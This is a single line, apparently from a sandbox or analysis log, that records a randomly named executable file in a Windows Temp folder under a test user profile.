file C:\Users\test22\AppData\Local\TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE